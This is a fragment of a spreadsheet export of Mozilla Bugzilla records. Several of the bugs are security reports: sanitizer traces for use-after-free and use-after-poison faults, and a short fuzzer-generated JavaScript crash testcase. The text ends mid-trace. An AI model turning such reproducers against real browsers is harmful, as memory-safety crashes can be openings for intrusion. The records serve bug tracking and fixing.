      <c r="C2353" t="inlineStr">
        <is>
          <t>Do a better job handling failure in JSCompartment::wrap</t>
        </is>
      </c>
      <c r="D2353" t="inlineStr">
        <is>
          <t>2014-11-19 19:36:09 -0800</t>
        </is>
      </c>
      <c r="E2353" t="n">
        <v>1</v>
      </c>
      <c r="F2353" t="n">
        <v>1</v>
      </c>
      <c r="G2353" t="n">
        <v>3</v>
      </c>
      <c r="H2353" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2353" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2353" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2353" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2353" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2353" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2353" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2353" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2353" t="inlineStr">
        <is>
          <t>[adv-main19+]</t>
        </is>
      </c>
      <c r="Q2353" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2353" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2353" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T2353" t="n">
        <v>1</v>
      </c>
      <c r="U2353" t="n">
        <v>0</v>
      </c>
      <c r="V2353" t="n">
        <v>5</v>
      </c>
      <c r="W2353" t="inlineStr">
        <is>
          <t>Created attachment 679003
patch
Since bug 793904, we're supposed to crash intentionally if a brain transplant fails. However, I realized that I missed a few cases where a brain transplant happens, so this patch adds some more MOZ_CRASH calls.
However, these extra calls make us crash during a JS reftest that uses up lots of stack and causes the recursion check in JSCompartment::wrap to fail. I considered taking out the recursion check, but it still seems useful given that PreCreate hooks could conceivably cause recursive wrap() calls. So instead I just gave the wrap() call a little extra C stack to work with than the rest of the engine gets. I think this makes sense, given how important it is that brain transplants succeed.
Note that C stack limit we use is a made-up number that's conservative, so we should have some leeway to exceed it as long as we don't go too far.</t>
        </is>
      </c>
      <c r="X2353" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2354">
      <c r="A2354" t="n">
        <v>1185033</v>
      </c>
      <c r="B2354" t="inlineStr">
        <is>
          <t>2015-07-17 10:39:38 -0700</t>
        </is>
      </c>
      <c r="C2354" t="inlineStr">
        <is>
          <t>ASan: use-after-poison in PK11_ImportDERPrivateKeyInfoAndReturnKey()</t>
        </is>
      </c>
      <c r="D2354" t="inlineStr">
        <is>
          <t>2016-08-09 11:48:17 -0700</t>
        </is>
      </c>
      <c r="E2354" t="n">
        <v>1</v>
      </c>
      <c r="F2354" t="n">
        <v>1</v>
      </c>
      <c r="G2354" t="n">
        <v>3</v>
      </c>
      <c r="H2354" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2354" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J2354" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K2354" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L2354" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2354" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2354" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2354" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2354" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][b2g-adv-main2.5?][adv-main45+][adv-esr38.8+]</t>
        </is>
      </c>
      <c r="Q2354" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2354" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2354" t="inlineStr">
        <is>
          <t>3.21</t>
        </is>
      </c>
      <c r="T2354" t="n">
        <v>1</v>
      </c>
      <c r="U2354" t="n">
        <v>0</v>
      </c>
      <c r="V2354" t="n">
        <v>52</v>
      </c>
      <c r="W2354" t="inlineStr">
        <is>
          <t>Not sure if this is a security-sensitive issue, feel free to remove the flag if it isn't. Keep in mind that the WebCrypto API basically provides direct access to this function via JS.
==16549==ERROR: AddressSanitizer: use-after-poison on address 0x61d0000188c0 at pc 0x7f739cc30fdc bp 0x7ffe6379a0f0 sp 0x7ffe6379a0e0
WRITE of size 6 at 0x61d0000188c0 thread T0
    #0 0x7f739cc30fdb in memset /usr/include/x86_64-linux-gnu/bits/string3.h:90
    #1 0x7f739cc30fdb in SECKEY_DestroyPrivateKeyInfo /home/tim/nss/lib/cryptohi/seckey.c:1567
    #2 0x7f739ccf7a39 in PK11_ImportDERPrivateKeyInfoAndReturnKey /home/tim/nss/lib/pk11wrap/pk11pk12.c:245
    #3 0x40470e in main /home/tim/nss/cmd/checkcert/checkcert.c:39
    #4 0x7f739bd70a3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x20a3f)
    #5 0x404c68 in _start (/tmp/afl-ramdisk/fuzz-pkcs8/checkcert+0x404c68)
0x61d0000188c0 is located 576 bytes inside of 2048-byte region [0x61d000018680,0x61d000018e80)
allocated by thread T0 here:
    #0 0x7f739d5c4827 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x57827)
    #1 0x7f739b425e85 in PL_ArenaAllocate ../../../lib/ds/plarena.c:203
SUMMARY: AddressSanitizer: use-after-poison /usr/include/x86_64-linux-gnu/bits/string3.h:90 memset
Shadow bytes around the buggy address:
  0x0c3a7fffb0c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffb0d0: 00 00 00 00 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c3a7fffb0e0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c3a7fffb0f0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c3a7fffb100: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
=&gt;0x0c3a7fffb110: f7 f7 f7 f7 f7 f7 f7 f7[f7]f7 f7 f7 f7 f7 f7 f7
  0x0c3a7fffb120: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c3a7fffb130: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c3a7fffb140: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c3a7fffb150: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c3a7fffb160: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7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16549==ABORTING</t>
        </is>
      </c>
      <c r="X2354" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2355">
      <c r="A2355" t="n">
        <v>574543</v>
      </c>
      <c r="B2355" t="inlineStr">
        <is>
          <t>2010-06-24 18:57:47 -0700</t>
        </is>
      </c>
      <c r="C2355" t="inlineStr">
        <is>
          <t>Forum index doesn't validate</t>
        </is>
      </c>
      <c r="D2355" t="inlineStr">
        <is>
          <t>2011-08-30 14:46:32 -0700</t>
        </is>
      </c>
      <c r="E2355" t="n">
        <v>1</v>
      </c>
      <c r="F2355" t="n">
        <v>1</v>
      </c>
      <c r="G2355" t="n">
        <v>5</v>
      </c>
      <c r="H2355" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2355" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2355" t="inlineStr">
        <is>
          <t>Forum</t>
        </is>
      </c>
      <c r="K2355" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2355" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2355" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2355" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2355" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2355" t="inlineStr"/>
      <c r="Q2355" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2355" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2355" t="inlineStr">
        <is>
          <t>2011-09-06</t>
        </is>
      </c>
      <c r="T2355" t="n">
        <v>1</v>
      </c>
      <c r="U2355" t="n">
        <v>0</v>
      </c>
      <c r="V2355" t="n">
        <v>5</v>
      </c>
      <c r="W2355" t="inlineStr">
        <is>
          <t>https://support-stage-new.mozilla.com/en-US/forums/contributors doesn't validate:
http://validator.w3.org/check?uri=https%3A%2F%2Fsupport-stage-new.mozilla.com%2Fen-US%2Fforums%2Fcontributors&amp;charset=%28detect+automatically%29&amp;doctype=Inline&amp;group=0</t>
        </is>
      </c>
      <c r="X2355" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2356">
      <c r="A2356" t="n">
        <v>1221385</v>
      </c>
      <c r="B2356" t="inlineStr">
        <is>
          <t>2015-11-03 18:06:18 -0800</t>
        </is>
      </c>
      <c r="C2356" t="inlineStr">
        <is>
          <t>Crash [@ js::jit::ExecutableAllocator::releasePoolPages] or Assertion failure: m_refCount == 1, at jit/ExecutableAllocator.h or Assertion failure: jrt_-&gt;mutatingBackedgeList_, at jit/JitCompartment.h</t>
        </is>
      </c>
      <c r="D2356" t="inlineStr">
        <is>
          <t>2016-09-22 14:41:41 -0700</t>
        </is>
      </c>
      <c r="E2356" t="n">
        <v>1</v>
      </c>
      <c r="F2356" t="n">
        <v>1</v>
      </c>
      <c r="G2356" t="n">
        <v>3</v>
      </c>
      <c r="H2356" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2356" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2356" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2356" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2356" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2356" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2356" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2356" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2356" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main44+][adv-esr38.6+]</t>
        </is>
      </c>
      <c r="Q2356" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2356" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2356" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T2356" t="n">
        <v>1</v>
      </c>
      <c r="U2356" t="n">
        <v>0</v>
      </c>
      <c r="V2356" t="n">
        <v>23</v>
      </c>
      <c r="W2356" t="inlineStr">
        <is>
          <t>// jsfunfuzz-generated
setJitCompilerOption('baseline.enable', 1);
// Adapted from randomly chosen test: js/src/jit-test/tests/basic/testBug756919.js
gcparam("maxBytes", gcparam("gcBytes") + 1);
function f() {}
f();
asserts js debug shell on m-c changeset 451a18579143 with --fuzzing-safe --no-threads --no-ion --no-baseline at Assertion failure: m_refCount == 1, at jit/ExecutableAllocator.h
Configure options:
CC="clang -Qunused-arguments" CXX="clang++ -Qunused-arguments" AR=ar AUTOCONF=/usr/local/Cellar/autoconf213/2.13/bin/autoconf213 sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=x86_64-apple-darwin12.5.0 --enable-debug --disable-threadsafe --enable-more-deterministic --with-ccache --enable-gczeal --enable-debug-symbols --disable-tests
python -u ~/funfuzz/js/compileShell.py -b "--enable-debug --enable-more-deterministic" -r 451a18579143
autoBisect is running.</t>
        </is>
      </c>
      <c r="X2356" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2357">
      <c r="A2357" t="n">
        <v>1480321</v>
      </c>
      <c r="B2357" t="inlineStr">
        <is>
          <t>2018-08-01 21:46:17 -0700</t>
        </is>
      </c>
      <c r="C2357" t="inlineStr">
        <is>
          <t>[a11y] Unlabelled buttons and links in Phabricator</t>
        </is>
      </c>
      <c r="D2357" t="inlineStr">
        <is>
          <t>2019-10-28 07:36:44 -0700</t>
        </is>
      </c>
      <c r="E2357" t="n">
        <v>1</v>
      </c>
      <c r="F2357" t="n">
        <v>1</v>
      </c>
      <c r="G2357" t="n">
        <v>7</v>
      </c>
      <c r="H2357" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2357" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J2357" t="inlineStr">
        <is>
          <t>Phabricator</t>
        </is>
      </c>
      <c r="K2357" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2357" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2357" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2357" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2357" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2357" t="inlineStr"/>
      <c r="Q2357" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R2357" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2357" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2357" t="n">
        <v>1</v>
      </c>
      <c r="U2357" t="n">
        <v>0</v>
      </c>
      <c r="V2357" t="n">
        <v>9</v>
      </c>
      <c r="W2357" t="inlineStr">
        <is>
          <t>Normally, I'd file these as separate bugs, but since these have to be filed upstream, I figured it made sense to track them as one bug here.
There are several unlabelled links/buttons in Phabricator. For example, visit this URL:
https://phabricator.services.mozilla.com/D2642
For each of the following, you can use the Firefox Accessibility Inspector and observe that the "name" property is empty or doesn't contain any useful text.
1. The search buttons (id UQ0_94 class fa-search, id UQ0_95 class phabricator-main-menu-search-dropdown).
2. Preferences menu links (class phabricator-core-user-menu).
3. Links with the classes phui-head-thing-image, phui-timeline-image. They seem to link to the user, but I don't know why they double up the labelled links for the user later.
4. The link to remove an action once you add one. Doesn't have a class, but the selector ".aphront-form-error a" should cover it.
5. A button near the end of the DOM; no idea what it does. The selector ".diff-banner-buttons button" should cover it.
This is just what I found on a first "real world" review; there are probably others.</t>
        </is>
      </c>
      <c r="X2357" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2358">
      <c r="A2358" t="n">
        <v>613376</v>
      </c>
      <c r="B2358" t="inlineStr">
        <is>
          <t>2010-11-18 16:01:06 -0800</t>
        </is>
      </c>
      <c r="C2358" t="inlineStr">
        <is>
          <t>[Mac, OOPP] Firefox 4.0b8pre crash in [@ nsNPAPIPluginInstance::GetOwner ], possibly only with Silverlight plugin</t>
        </is>
      </c>
      <c r="D2358" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E2358" t="n">
        <v>1</v>
      </c>
      <c r="F2358" t="n">
        <v>1</v>
      </c>
      <c r="G2358" t="n">
        <v>6</v>
      </c>
      <c r="H2358" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2358" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2358" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K2358" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2358" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2358" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2358" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2358" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2358" t="inlineStr">
        <is>
          <t>[sg:critical? on trunk][qa-ntd-192] [qa-ntd-191]</t>
        </is>
      </c>
      <c r="Q2358" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2358" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2358" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2358" t="n">
        <v>1</v>
      </c>
      <c r="U2358" t="n">
        <v>0</v>
      </c>
      <c r="V2358" t="n">
        <v>37</v>
      </c>
      <c r="W2358" t="inlineStr">
        <is>
          <t>Seen while reviewing trunk crash stats and new to the D	20101118063017 build. http://tinyurl.com/2f56b6g to the crashes which are all Mac.
Frame 	Module 	Signature [Expand] 	Source
0 	XUL 	nsNPAPIPluginInstance::GetOwner 	nsISupportsUtils.h:94
1 	XUL 	nsPluginStreamListenerPeer::GetInterfaceGlobal 	modules/plugin/base/src/nsPluginStreamListenerPeer.cpp:1259
2 	XUL 	nsHttpChannel::OnTransportStatus 	nsNetUtil.h:1287
3 	XUL 	nsTransportStatusEvent::Run 	netwerk/base/src/nsTransportUtils.cpp:112
4 	XUL 	nsThread::ProcessNextEvent 	xpcom/threads/nsThread.cpp:610
5 	XUL 	NS_ProcessPendingEvents_P 	nsThreadUtils.cpp:200
6 	XUL 	nsBaseAppShell::NativeEventCallback 	widget/src/xpwidgets/nsBaseAppShell.cpp:131
7 	XUL 	nsAppShell::ProcessGeckoEvents 	widget/src/cocoa/nsAppShell.mm:399
8 	CoreFoundation 	CoreFoundation@0x4e400 	
9 	CoreFoundation 	CoreFoundation@0x4c5f8 	
10 	XUL 	PopupAllowedForEvent 	nsTSubstring.h:113
11 	XUL 	XUL@0x12eaabf 	
12 	XUL 	nsEventListenerManager::HandleEventInternal 	dom/base/nsPIDOMWindow.h:657
13 		@0x77 	
14 	libSystem.B.dylib 	libSystem.B.dylib@0x4ee9 	
15 	XUL 	nsGenericElement::AddRef 	nsISupportsImpl.h:161
16 	XUL 	nsCOMPtr_base::assign_with_AddRef 	nsCOMPtr.cpp:88
17 	XUL 	nsDOMEvent::DuplicatePrivateData 	nsAutoPtr.h:957
18 		@0x7fff7118962f 	
19 	CoreFoundation 	CoreFoundation@0x1b1ef 	
20 	XUL 	nsGenericElement::Release 	nsISupportsImpl.h:210
21 	XUL 	nsEventDispatcher::Dispatch 	nsCOMPtr.h:492
22 		@0x13ddfc07f 	
23 	libSystem.B.dylib 	libSystem.B.dylib@0x6bf9 	
24 	libSystem.B.dylib 	libSystem.B.dylib@0x527f 	
25 	libSystem.B.dylib 	libSystem.B.dylib@0x9a03 	
26 	libSystem.B.dylib 	libSystem.B.dylib@0x3b73a 	
27 	CoreFoundation 	CoreFoundation@0x609e3 	
28 	libSystem.B.dylib 	libSystem.B.dylib@0x823b 	
29 	CarbonCore 	CarbonCore@0x22d8d 	
30 	CarbonCore 	CarbonCore@0x22c9c 	
31 	HIToolbox 	HIToolbox@0x54fe5 	
32 	HIToolbox 	HIToolbox@0x30031 	
33 	HIToolbox 	HIToolbox@0x2ff7c 	
34 	libSystem.B.dylib 	libSystem.B.dylib@0x46ae 	
35 	HIToolbox 	HIToolbox@0x2fbaf 	
36 	CoreFoundation 	CoreFoundation@0x505a2 	
37 	XUL 	nsHttpConnection::OnOutputStreamReady 	netwerk/protocol/http/nsHttpConnection.cpp:802
38 		@0x7fff5fbfe45f 	
39 	HIToolbox 	HIToolbox@0x2f9ff 	
40 	libSystem.B.dylib 	libSystem.B.dylib@0x66b3 	
41 	CoreFoundation 	CoreFoundation@0xbaaf 	
42 	CoreFoundation 	CoreFoundation@0x60b1f 	
43 	CoreFoundation 	CoreFoundation@0x70f0f 	
44 	libSystem.B.dylib 	libSystem.B.dylib@0x66b3 	
45 	CoreFoundation 	CoreFoundation@0x70c62 	
46 	CoreFoundation 	CoreFoundation@0x709c7 	
47 	CoreFoundation 	CoreFoundation@0x4bdbe 	
48 	XUL 	-[ChildView keyUp:] 	nsTSubstring.h:113
49 	CoreFoundation 	CoreFoundation@0x1052b 	
50 	CoreFoundation 	CoreFoundation@0x2232a 	
51 	CoreFoundation 	CoreFoundation@0x1052b 	
52 	libSystem.B.dylib 	libSystem.B.dylib@0x66b3 	
53 	CoreFoundation 	CoreFoundation@0x65f1 	
54 	CoreFoundation 	CoreFoundation@0xfcd6 	
55 	CoreFoundation 	CoreFoundation@0xfb2e 	
56 	CoreFoundation 	CoreFoundation@0x2b91b 	
57 	CoreFoundation 	CoreFoundation@0x6378b 	
58 	AppKit 	AppKit@0x45166 	
59 	AppKit 	AppKit@0x436f1 	
60 	CoreFoundation 	CoreFoundation@0x104c7 	
61 	AppKit 	AppKit@0x7413e7 	
62 	AppKit 	AppKit@0x72ed8 	
63 	AppKit 	AppKit@0x437a8 	
64 	libSystem.B.dylib 	libSystem.B.dylib@0xa2d8 	
65 	CoreFoundation 	CoreFoundation@0x104c7 	
66 	CoreFoundation 	CoreFoundation@0x24d5b 	
67 	XUL 	js_InitReflectClass 	js/src/jsobjinlines.h:944
68 		@0x18f 	
69 	CoreFoundation 	CoreFoundation@0x249d2 	
70 	CoreFoundation 	CoreFoundation@0x54929 	
71 	CoreFoundation 	CoreFoundation@0x24a68 	
72 	libSystem.B.dylib 	libSystem.B.dylib@0x66c7 	
73 	CoreFoundation 	CoreFoundation@0x3527b 	
74 	AppKit 	AppKit@0x77e03f 	
75 	libSystem.B.dylib 	libSystem.B.dylib@0x66c7 	
76 	Foundation 	Foundation@0x2eed 	
77 	CoreFoundation 	CoreFoundation@0x2a883 	
78 	libSystem.B.dylib 	libSystem.B.dylib@0x66c7 	
79 	AppKit 	AppKit@0x77e03f 	
80 	AppKit 	AppKit@0x948a 	
81 	XUL 	nsAppShell::Run 	widget/src/cocoa/nsAppShell.mm:746
82 	XUL 	nsAppStartup::Run 	toolkit/components/startup/src/nsAppStartup.cpp:191
83 	XUL 	XRE_main 	toolkit/xre/nsAppRunner.cpp:3682
84 	firefox-bin 	main 	browser/app/nsBrowserApp.cpp:158
85 	firefox-bin 	firefox-bin@0x1953</t>
        </is>
      </c>
      <c r="X2358" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2359">
      <c r="A2359" t="n">
        <v>897668</v>
      </c>
      <c r="B2359" t="inlineStr">
        <is>
          <t>2013-07-24 13:52:15 -0700</t>
        </is>
      </c>
      <c r="C2359" t="inlineStr">
        <is>
          <t>product facet is hard-coded for Firefox or Firefox for Android</t>
        </is>
      </c>
      <c r="D2359" t="inlineStr">
        <is>
          <t>2017-01-11 13:59:51 -0800</t>
        </is>
      </c>
      <c r="E2359" t="n">
        <v>1</v>
      </c>
      <c r="F2359" t="n">
        <v>1</v>
      </c>
      <c r="G2359" t="n">
        <v>6</v>
      </c>
      <c r="H2359" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2359" t="inlineStr">
        <is>
          <t>Input Graveyard</t>
        </is>
      </c>
      <c r="J2359" t="inlineStr">
        <is>
          <t>Dashboard</t>
        </is>
      </c>
      <c r="K2359" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2359" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2359" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2359" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2359" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2359" t="inlineStr">
        <is>
          <t>u=user c=dashboard p=1 s=input.2013q3</t>
        </is>
      </c>
      <c r="Q2359" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2359" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2359" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2359" t="n">
        <v>1</v>
      </c>
      <c r="U2359" t="n">
        <v>0</v>
      </c>
      <c r="V2359" t="n">
        <v>4</v>
      </c>
      <c r="W2359" t="inlineStr">
        <is>
          <t>There is no product column in the table, so we infer the product based on whether or not the platform is "android" since we only support Firefox and Firefox for Android in Input.
We need to add support for FirefoxOS. That's also a valid platform field value, so we'll continue the tradition and add support for that.</t>
        </is>
      </c>
      <c r="X2359" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2360">
      <c r="A2360" t="n">
        <v>695561</v>
      </c>
      <c r="B2360" t="inlineStr">
        <is>
          <t>2011-10-18 16:37:59 -0700</t>
        </is>
      </c>
      <c r="C2360" t="inlineStr">
        <is>
          <t>Non-ASCII characters in LAST_SEARCH_COOKIE not turned back into Unicode</t>
        </is>
      </c>
      <c r="D2360" t="inlineStr">
        <is>
          <t>2011-10-24 10:02:18 -0700</t>
        </is>
      </c>
      <c r="E2360" t="n">
        <v>1</v>
      </c>
      <c r="F2360" t="n">
        <v>1</v>
      </c>
      <c r="G2360" t="n">
        <v>5</v>
      </c>
      <c r="H2360" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2360" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2360" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K2360" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2360" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2360" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2360" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2360" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2360" t="inlineStr"/>
      <c r="Q2360" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2360" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2360" t="inlineStr">
        <is>
          <t>2011-10-25</t>
        </is>
      </c>
      <c r="T2360" t="n">
        <v>1</v>
      </c>
      <c r="U2360" t="n">
        <v>0</v>
      </c>
      <c r="V2360" t="n">
        <v>6</v>
      </c>
      <c r="W2360" t="inlineStr">
        <is>
          <t>STR:
1. Search for "dévellopement".
2. Click on some article (not back to the home page, see bug 695532).
3. Observe search box.
Expected result: "dévellopement".
Actual result: "d\303\251vellopement".
See bug 695553 for a relevant recent patch--we may need to change the solution there.</t>
        </is>
      </c>
      <c r="X2360" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2361">
      <c r="A2361" t="n">
        <v>1423086</v>
      </c>
      <c r="B2361" t="inlineStr">
        <is>
          <t>2017-12-04 21:00:42 -0800</t>
        </is>
      </c>
      <c r="C2361" t="inlineStr">
        <is>
          <t>Use After Free in PeerConnectionImpl::DTMFSendTimerCallback_m()</t>
        </is>
      </c>
      <c r="D2361" t="inlineStr">
        <is>
          <t>2024-05-30 09:39:23 -0700</t>
        </is>
      </c>
      <c r="E2361" t="n">
        <v>1</v>
      </c>
      <c r="F2361" t="n">
        <v>1</v>
      </c>
      <c r="G2361" t="n">
        <v>3</v>
      </c>
      <c r="H2361" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2361" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2361" t="inlineStr">
        <is>
          <t>WebRTC: Signaling</t>
        </is>
      </c>
      <c r="K2361" t="inlineStr">
        <is>
          <t>59 Branch</t>
        </is>
      </c>
      <c r="L2361" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2361" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2361" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2361" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2361" t="inlineStr">
        <is>
          <t>[fixed by bug 1425901][adv-main58+][adv-esr52.6+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2361" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2361" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2361" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2361" t="n">
        <v>1</v>
      </c>
      <c r="U2361" t="n">
        <v>0</v>
      </c>
      <c r="V2361" t="n">
        <v>38</v>
      </c>
      <c r="W2361" t="inlineStr">
        <is>
          <t>Created attachment 8934391
UAF_DTMFSendTimerCallback_m_PoC.html
Reproduction test case: UAF_DTMFSendTimerCallback_m_PoC.html
Steps to reproduce: 
	1. Open UAF_DTMFSendTimerCallback_m_PoC.html in Firefox browser.
    2. Firefox crashes in PeerConnectionImpl::DTMFSendTimerCallback_m() by accessing freed memory.
		=================================================================
		==9169==ERROR: AddressSanitizer: heap-use-after-free on address 0x606000198b88 at pc 0x7f94ab7d4e10 bp 0x7ffc550cc950 sp 0x7ffc550cc948
		READ of size 4 at 0x606000198b88 thread T0 (file:// Content)
			#0 0x7f94ab7d4e0f in IsEmpty /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTStringRepr.h:186:12
